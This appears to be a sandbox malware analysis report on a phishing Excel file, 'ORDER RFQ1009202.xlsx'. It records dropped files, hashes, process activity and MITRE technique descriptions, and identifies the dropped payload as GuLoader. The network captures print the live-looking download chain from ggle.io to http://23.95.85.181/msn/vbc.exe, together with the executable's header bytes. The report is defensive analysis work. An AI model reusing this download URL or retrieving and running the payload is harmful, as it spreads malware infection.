Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF40A54.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3B5FE45.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.0734640463696286
Encrypted:	false
SSDEEP:	1536:YoWKN83Xv+cALoeaAVFyj6Jr7MX0LzxIKt5M/NPpIsx:tWYIXmcA8FAu2JEXEtItI
MD5:	4399C694E88F3F32D22D91C6C4A173ED
SHA1:	FA50DF0581C5591073C6C48D5DFCF575FA272198
SHA-256:	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00
SHA-512:	EBAE4C3A8367F40B1742E7F0A62757AD37C802413C6C274C094520EBD580B475368D812AAE38B881C717BFE03C0AEE9088658D80D0DE4AA02BD9475065BD2260
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 28%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0......\.............@..........................0..............................................4...(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.98841165708155
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	ORDER RFQ1009202.xlsx
File size:	601912
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
SHA512:	15b3683e6193b8abd337168b3847af917308950490b0344a80e6e019d4d116d639741596e5290657b94f78189706f758716143c0918c34377dc1aa2ec661cd68
SSDEEP:	12288:gbIq1V9JJV8sfKZa5Sg3bAawvGRiZ/woMWGY4TS2ZnD:KIEKs46H3bArGRiq64D
File Content Preview:	........................>.......................................................................................{..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 12:17:17.343616009 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.343656063 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.343720913 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.354707003 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.354732990 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.419389009 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.419579029 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.420301914 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.420433998 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.434212923 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.434237003 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.434743881 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.434842110 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.686927080 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.731153011 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047235966 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047524929 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.047553062 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047609091 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.052607059 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.052747011 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.052823067 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.080698013 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.191730022 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.191977978 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.192605972 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.309433937 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309463978 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309477091 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309489012 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309660912 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.421314955 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421351910 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421369076 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421391010 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421411991 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421433926 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421457052 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421478033 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421526909 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.421560049 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535042048 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535078049 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535103083 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535109043 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535150051 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535152912 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535161018 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535186052 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535202980 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535218954 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535229921 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535232067 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535244942 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535257101 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535269022 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535281897 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535299063 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535321951 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535340071 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535362959 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535387993 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.537224054 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646368980 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646428108 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646467924 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646507025 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646508932 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646537066 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646548033 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646549940 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646600008 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646644115 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646646023 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646682978 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646722078 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646727085 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646763086 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646800041 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646806002 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646838903 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646838903 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646878004 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646919966 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646924973 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646967888 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647006989 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647008896 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647046089 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647083998 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647088051 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647157907 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647209883 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647213936 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647255898 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647264957 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647294044 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647341967 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647342920 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647387028 CEST	80	49166	23.95.85.181	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 12:17:17.274439096 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 14, 2021 12:17:17.321638107 CEST	53	52167	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 12:17:17.274439096 CEST	192.168.2.22	8.8.8.8	0x267c	Standard query (0)	ggle.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 14, 2021 12:17:17.321638107 CEST	8.8.8.8	192.168.2.22	0x267c	No error (0)	ggle.io		151.101.65.195	A (IP address)	IN (0x0001)
Sep 14, 2021 12:17:17.321638107 CEST	8.8.8.8	192.168.2.22	0x267c	No error (0)	ggle.io		151.101.1.195	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ggle.io

23.95.85.181

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	151.101.65.195	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	23.95.85.181	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 12:17:18.192605972 CEST	8	OUT	GET /msn/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: 23.95.85.181
Sep 14, 2021 12:17:18.309433937 CEST	10	IN	HTTP/1.1 200 OK Date: Tue, 14 Sep 2021 17:17:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Last-Modified: Tue, 14 Sep 2021 02:46:53 GMT ETag: "12000-5cbeb98214636" Accept-Ranges: bytes Content-Length: 73728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELH0\@04( ( ,.text `.data@.rsrc @@IMSVBVM60.DLL

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	151.101.65.195	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2021-09-14 10:17:17 UTC	0	OUT	GET /4GZv HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ggle.io Connection: Keep-Alive
2021-09-14 10:17:18 UTC	0	IN	HTTP/1.1 302 Found Connection: close Content-Length: 53 Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET Access-Control-Allow-Origin: * Access-Control-Max-Age: 3666 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/plain; charset=utf-8 Expires: 0 Function-Execution-Id: p8xahgil8nqu Location: http://23.95.85.181/msn/vbc.exe Pragma: no-cache Referer: ggle.io Server: Google Frontend X-Cloud-Trace-Context: 4496f6c0e9f1195e2c77dbf7bc1904e8;o=1 X-Country-Code: CH X-Powered-By: Express Accept-Ranges: bytes Date: Tue, 14 Sep 2021 10:17:18 GMT X-Served-By: cache-hhn4072-HHN X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1631614638.717716,VS0,VE318 Vary: Origin, Accept,cookie,need-authorization, x-fh-requested-host, accept-encoding
2021-09-14 10:17:18 UTC	1	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 38 35 2e 31 38 31 2f 6d 73 6e 2f 76 62 63 2e 65 78 65 Data Ascii: Found. Redirecting to http://23.95.85.181/msn/vbc.exe

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2012 Parent PID: 596

General

Start time:	12:16:21
Start date:	14/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f280000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: EQNEDT32.EXE PID: 2840 Parent PID: 596

General

Start time:	12:16:44
Start date:	14/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2664 Parent PID: 2840

General

Start time:	12:16:48
Start date:	14/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	4399C694E88F3F32D22D91C6C4A173ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 28%, ReversingLabs
Reputation:	low

Analysis Process: vbc.exe PID: 1412 Parent PID: 2664

General

Start time:	12:17:57
Start date:	14/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	4399C694E88F3F32D22D91C6C4A173ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

